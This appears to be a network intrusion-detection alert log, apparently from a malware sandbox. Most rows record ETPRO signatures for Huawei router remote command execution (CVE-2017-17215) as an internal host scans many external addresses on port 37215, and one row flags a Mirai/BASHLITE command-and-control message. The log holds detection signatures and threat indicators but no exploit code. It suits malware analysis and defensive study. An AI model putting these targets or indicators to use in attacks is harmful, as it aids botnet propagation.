                                                        06/13/24-21:33:07.042859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794637215192.168.2.14197.105.32.158
                                                        06/13/24-21:33:17.303795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841037215192.168.2.14197.25.146.217
                                                        06/13/24-21:33:09.084760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524637215192.168.2.14156.47.186.24
                                                        06/13/24-21:32:52.677265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481437215192.168.2.14156.243.253.12
                                                        06/13/24-21:32:19.728588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065437215192.168.2.14156.76.222.246
                                                        06/13/24-21:33:09.128457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3392837215192.168.2.14197.60.230.149
                                                        06/13/24-21:32:28.044391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.1441.64.194.114
                                                        06/13/24-21:31:59.195595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966637215192.168.2.1441.67.82.18
                                                        06/13/24-21:32:09.440315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536637215192.168.2.14197.130.145.215
                                                        06/13/24-21:33:11.159380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795637215192.168.2.14156.156.33.119
                                                        06/13/24-21:32:11.488163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836437215192.168.2.1441.136.117.124
                                                        06/13/24-21:32:13.545199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436437215192.168.2.14156.116.126.128
                                                        06/13/24-21:32:40.353081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103437215192.168.2.14156.198.100.172
                                                        06/13/24-21:32:09.438166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583837215192.168.2.1441.15.95.79
                                                        06/13/24-21:32:21.800192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550037215192.168.2.14197.8.88.245
                                                        06/13/24-21:32:30.078179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4594437215192.168.2.1441.95.156.255
                                                        06/13/24-21:33:11.154891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816837215192.168.2.14197.194.48.49
                                                        06/13/24-21:33:11.174832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909037215192.168.2.1441.39.210.121
                                                        06/13/24-21:32:54.707693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755837215192.168.2.14156.6.102.235
                                                        06/13/24-21:32:36.267702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853637215192.168.2.14156.91.110.213
                                                        06/13/24-21:32:58.838981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372837215192.168.2.14197.251.54.218
                                                        06/13/24-21:32:23.831756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795437215192.168.2.14197.194.229.60
                                                        06/13/24-21:33:00.889659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977037215192.168.2.14197.130.84.17
                                                        06/13/24-21:32:13.564201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934637215192.168.2.14197.70.86.158
                                                        06/13/24-21:32:01.220677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4907637215192.168.2.14156.206.120.106
                                                        06/13/24-21:32:50.614447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029637215192.168.2.14156.96.103.190
                                                        06/13/24-21:32:03.295169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002837215192.168.2.14156.25.200.5
                                                        06/13/24-21:32:05.347368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282637215192.168.2.14197.126.99.254
                                                        06/13/24-21:33:00.869414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379437215192.168.2.14156.119.175.45
                                                        06/13/24-21:32:03.299400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481437215192.168.2.14197.152.83.80
                                                        06/13/24-21:33:02.913005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127037215192.168.2.14197.34.241.158
                                                        06/13/24-21:33:11.180159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995637215192.168.2.14156.218.30.100
                                                        06/13/24-21:32:58.821566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339437215192.168.2.1441.54.179.120
                                                        06/13/24-21:33:07.042737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3604637215192.168.2.14197.138.247.118
                                                        06/13/24-21:32:03.298943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473037215192.168.2.14197.190.221.106
                                                        06/13/24-21:32:13.564360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047837215192.168.2.1441.1.224.164
                                                        06/13/24-21:31:59.175478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047237215192.168.2.14197.68.100.216
                                                        06/13/24-21:32:56.754720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814637215192.168.2.14156.13.79.1
                                                        06/13/24-21:32:42.417648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374237215192.168.2.14156.181.91.90
                                                        06/13/24-21:32:25.978438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866637215192.168.2.14197.88.140.7
                                                        06/13/24-21:33:02.911203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14197.178.124.107
                                                        06/13/24-21:32:03.279541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638037215192.168.2.1441.243.166.99
                                                        06/13/24-21:32:05.345146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628837215192.168.2.14156.111.229.77
                                                        06/13/24-21:32:42.404238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343637215192.168.2.1441.181.66.79
                                                        06/13/24-21:32:19.752554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764437215192.168.2.14156.69.211.121
                                                        06/13/24-21:32:52.670241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596237215192.168.2.1441.252.248.66
                                                        06/13/24-21:32:32.166549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127037215192.168.2.1441.189.162.214
                                                        06/13/24-21:32:40.356311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211837215192.168.2.14197.50.24.143
                                                        06/13/24-21:32:23.835829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582437215192.168.2.1441.36.26.229
                                                        06/13/24-21:32:32.150414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460037215192.168.2.14156.85.174.248
                                                        06/13/24-21:32:40.375997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452437215192.168.2.14156.164.51.128
                                                        06/13/24-21:32:05.369232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549637215192.168.2.1441.114.227.113
                                                        06/13/24-21:32:30.073784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308237215192.168.2.14156.218.22.161
                                                        06/13/24-21:32:30.096906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395837215192.168.2.14197.168.58.170
                                                        06/13/24-21:32:36.263292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149437215192.168.2.14156.227.189.206
                                                        06/13/24-21:32:17.695133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182837215192.168.2.1441.196.185.220
                                                        06/13/24-21:31:59.174278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596237215192.168.2.14156.183.60.101
                                                        06/13/24-21:31:59.177457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547437215192.168.2.1441.83.124.1
                                                        06/13/24-21:32:17.676792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924837215192.168.2.1441.211.154.252
                                                        06/13/24-21:32:05.370064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352837215192.168.2.14197.102.25.166
                                                        06/13/24-21:32:46.527989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819837215192.168.2.14156.115.174.52
                                                        06/13/24-21:33:07.042919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517237215192.168.2.1441.22.102.155
                                                        06/13/24-21:32:03.297480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764637215192.168.2.14156.32.187.77
                                                        06/13/24-21:32:50.614024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744037215192.168.2.14156.138.101.46
                                                        06/13/24-21:32:23.830999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329037215192.168.2.1441.135.167.81
                                                        06/13/24-21:32:56.785264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017637215192.168.2.14156.107.14.126
                                                        06/13/24-21:32:40.356909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660037215192.168.2.1441.183.80.139
                                                        06/13/24-21:33:02.909709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638037215192.168.2.1441.184.142.238
                                                        06/13/24-21:32:50.612643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.14197.186.115.73
                                                        06/13/24-21:32:44.457813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038237215192.168.2.1441.218.54.115
                                                        06/13/24-21:33:11.160293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019037215192.168.2.14156.201.114.188
                                                        06/13/24-21:33:09.085423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.14156.62.133.232
                                                        06/13/24-21:33:11.173039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946437215192.168.2.1441.60.6.189
                                                        06/13/24-21:32:09.438118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808237215192.168.2.14156.5.250.193
                                                        06/13/24-21:32:34.190891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895637215192.168.2.14156.53.115.105
                                                        06/13/24-21:32:48.553175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071237215192.168.2.14156.49.76.228
                                                        06/13/24-21:33:15.274965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129037215192.168.2.14197.210.81.30
                                                        06/13/24-21:33:17.308114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988437215192.168.2.1441.94.173.229
                                                        06/13/24-21:32:30.125948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798037215192.168.2.14156.152.11.111
                                                        06/13/24-21:32:44.478385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822237215192.168.2.1441.120.207.96
                                                        06/13/24-21:31:59.175535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912237215192.168.2.1441.0.221.87
                                                        06/13/24-21:32:23.928941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934437215192.168.2.1441.2.189.43
                                                        06/13/24-21:32:58.844232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875437215192.168.2.1441.226.159.204
                                                        06/13/24-21:31:57.092676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822637215192.168.2.14197.225.49.66
                                                        06/13/24-21:31:57.091900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905837215192.168.2.1441.164.83.142
                                                        06/13/24-21:32:19.731232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536637215192.168.2.1441.229.7.192
                                                        06/13/24-21:32:32.165202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964637215192.168.2.1441.36.117.34
                                                        06/13/24-21:32:50.614228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809637215192.168.2.14156.124.190.155
                                                        06/13/24-21:32:52.671022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4717237215192.168.2.14197.240.5.220
                                                        06/13/24-21:32:32.168829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386437215192.168.2.14156.93.2.151
                                                        06/13/24-21:32:11.506050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3408037215192.168.2.14197.242.90.219
                                                        06/13/24-21:32:23.945451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263437215192.168.2.14197.15.154.234
                                                        06/13/24-21:32:01.224840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538637215192.168.2.14156.15.6.23
                                                        06/13/24-21:32:01.218348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488837215192.168.2.14156.162.190.12
                                                        06/13/24-21:32:52.669718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982637215192.168.2.14197.158.91.141
                                                        06/13/24-21:32:15.635830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953237215192.168.2.1441.254.82.189
                                                        06/13/24-21:32:23.945844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688237215192.168.2.14197.19.174.175
                                                        06/13/24-21:32:05.344515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.14156.179.40.130
                                                        06/13/24-21:32:50.613113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443237215192.168.2.14197.14.36.142
                                                        06/13/24-21:32:09.437989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836237215192.168.2.14156.67.226.176
                                                        06/13/24-21:33:04.994165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028237215192.168.2.14197.162.244.205
                                                        06/13/24-21:32:23.940932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946837215192.168.2.1441.237.240.202
                                                        06/13/24-21:33:09.109657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572837215192.168.2.14156.84.255.174
                                                        06/13/24-21:32:09.439065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061037215192.168.2.14197.131.181.240
                                                        06/13/24-21:32:30.079711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767437215192.168.2.14197.157.142.254
                                                        06/13/24-21:32:36.268409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304237215192.168.2.14156.119.239.28
                                                        06/13/24-21:31:57.153585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921837215192.168.2.14156.198.106.25
                                                        06/13/24-21:32:09.457111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079837215192.168.2.1441.51.228.233
                                                        06/13/24-21:32:30.075354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369837215192.168.2.14156.252.10.188
                                                        06/13/24-21:32:09.438996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868037215192.168.2.14156.97.232.229
                                                        06/13/24-21:33:02.908739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850437215192.168.2.14197.136.79.139
                                                        06/13/24-21:33:15.252081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374837215192.168.2.14197.14.227.185
                                                        06/13/24-21:33:07.060846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177437215192.168.2.14197.166.37.9
                                                        06/13/24-21:32:28.048039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858237215192.168.2.1441.254.144.180
                                                        06/13/24-21:32:30.077597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055637215192.168.2.14156.213.92.105
                                                        06/13/24-21:32:48.554281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123637215192.168.2.14156.30.42.222
                                                        06/13/24-21:32:44.476922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878237215192.168.2.14156.49.185.120
                                                        06/13/24-21:32:56.788828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845237215192.168.2.14156.101.88.88
                                                        06/13/24-21:32:50.612903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091237215192.168.2.14197.182.58.229
                                                        06/13/24-21:32:52.680652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139437215192.168.2.14197.105.81.120
                                                        06/13/24-21:32:34.196389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660837215192.168.2.1441.235.20.220
                                                        06/13/24-21:33:13.210542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14197.137.57.112
                                                        06/13/24-21:32:17.678730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709837215192.168.2.1441.163.70.151
                                                        06/13/24-21:33:09.110135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018837215192.168.2.14156.216.2.146
                                                        06/13/24-21:32:46.503044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724437215192.168.2.14156.150.45.53
                                                        06/13/24-21:33:15.275870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211637215192.168.2.14197.139.97.108
                                                        06/13/24-21:32:28.304095TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message455454210103.82.38.94192.168.2.14
                                                        06/13/24-21:32:03.275822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872237215192.168.2.14197.138.1.242
                                                        06/13/24-21:32:48.554310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934237215192.168.2.14156.198.144.84
                                                        06/13/24-21:32:30.127760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172237215192.168.2.1441.91.105.26
                                                        06/13/24-21:33:04.994076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012837215192.168.2.14156.202.231.61
                                                        06/13/24-21:32:58.824159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200637215192.168.2.14197.252.115.159
                                                        06/13/24-21:33:15.254431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018437215192.168.2.14197.201.35.22
                                                        06/13/24-21:32:56.757537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446437215192.168.2.1441.130.6.96
                                                        06/13/24-21:32:40.356871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896037215192.168.2.14197.87.0.194
                                                        06/13/24-21:33:09.129013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212637215192.168.2.1441.15.161.235
                                                        06/13/24-21:32:25.996660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733637215192.168.2.14156.150.17.136
                                                        06/13/24-21:32:30.074714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527037215192.168.2.1441.230.137.41
                                                        06/13/24-21:32:48.570188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150837215192.168.2.14156.168.102.200
                                                        06/13/24-21:32:13.569503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758837215192.168.2.14156.13.37.188
                                                        06/13/24-21:32:40.355474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577037215192.168.2.14197.58.223.206
                                                        06/13/24-21:32:21.800600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924237215192.168.2.14197.218.1.171
                                                        06/13/24-21:32:01.219877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778637215192.168.2.14197.220.42.12
                                                        06/13/24-21:32:23.937176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202637215192.168.2.14197.244.225.135
                                                        06/13/24-21:32:48.567846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965037215192.168.2.1441.132.230.75
                                                        06/13/24-21:32:54.725027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793437215192.168.2.14197.13.254.178
                                                        06/13/24-21:32:19.751968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397437215192.168.2.14197.143.32.24
                                                        06/13/24-21:33:00.887608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481237215192.168.2.14156.47.26.56
                                                        06/13/24-21:32:58.841735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116237215192.168.2.14197.45.14.130
                                                        06/13/24-21:33:00.885921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441637215192.168.2.1441.217.77.39
                                                        06/13/24-21:32:34.217222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.14197.217.72.69
                                                        06/13/24-21:33:07.039137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502037215192.168.2.14156.189.197.192
                                                        06/13/24-21:33:13.210799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505237215192.168.2.1441.119.100.112
                                                        06/13/24-21:32:05.344210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588037215192.168.2.14197.192.255.92
                                                        06/13/24-21:32:40.356354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503837215192.168.2.14156.122.141.139
                                                        06/13/24-21:32:48.555360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762437215192.168.2.14156.144.206.86
                                                        06/13/24-21:32:21.784649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792637215192.168.2.14156.136.106.61
                                                        06/13/24-21:33:07.042564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146037215192.168.2.14156.235.18.186
                                                        06/13/24-21:31:57.153517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688637215192.168.2.14197.218.26.77
                                                        06/13/24-21:32:05.348262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223037215192.168.2.1441.4.219.237
                                                        06/13/24-21:32:05.345473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903037215192.168.2.14197.11.214.254
                                                        06/13/24-21:32:46.509330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265837215192.168.2.14197.50.5.196
                                                        06/13/24-21:33:11.155436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040437215192.168.2.14197.134.9.143
                                                        06/13/24-21:32:34.193439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869037215192.168.2.14197.2.163.224
                                                        06/13/24-21:32:38.321525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139637215192.168.2.1441.6.92.35
                                                        06/13/24-21:32:48.567520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459237215192.168.2.14197.235.128.248
                                                        06/13/24-21:32:03.300332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914837215192.168.2.1441.31.34.212
                                                        06/13/24-21:32:48.551045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.14156.253.69.235
                                                        06/13/24-21:33:07.039261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507037215192.168.2.1441.232.5.103
                                                        06/13/24-21:32:48.567737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302437215192.168.2.1441.123.190.111
                                                        06/13/24-21:32:40.374673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022237215192.168.2.14156.1.81.80
                                                        06/13/24-21:31:57.091961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052837215192.168.2.14197.222.221.189
                                                        06/13/24-21:32:13.547297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559837215192.168.2.14156.217.140.245
                                                        06/13/24-21:32:32.152961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349637215192.168.2.14197.225.135.141
                                                        06/13/24-21:33:15.253699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015037215192.168.2.14197.135.3.165
                                                        06/13/24-21:33:15.269172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772037215192.168.2.14197.75.97.143
                                                        06/13/24-21:32:30.097507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903037215192.168.2.14156.155.196.96
                                                        06/13/24-21:32:54.707823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353837215192.168.2.1441.182.45.167
                                                        06/13/24-21:32:36.243152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515037215192.168.2.1441.153.60.54
                                                        06/13/24-21:33:09.090158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829037215192.168.2.14197.143.102.229
                                                        06/13/24-21:32:36.248395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794437215192.168.2.1441.94.177.110
                                                        06/13/24-21:33:11.176129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000237215192.168.2.1441.32.75.223
                                                        06/13/24-21:32:50.630543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842037215192.168.2.14156.58.112.104
                                                        06/13/24-21:33:13.229929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153437215192.168.2.14197.197.5.249
                                                        06/13/24-21:33:11.158033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798037215192.168.2.14156.125.132.145
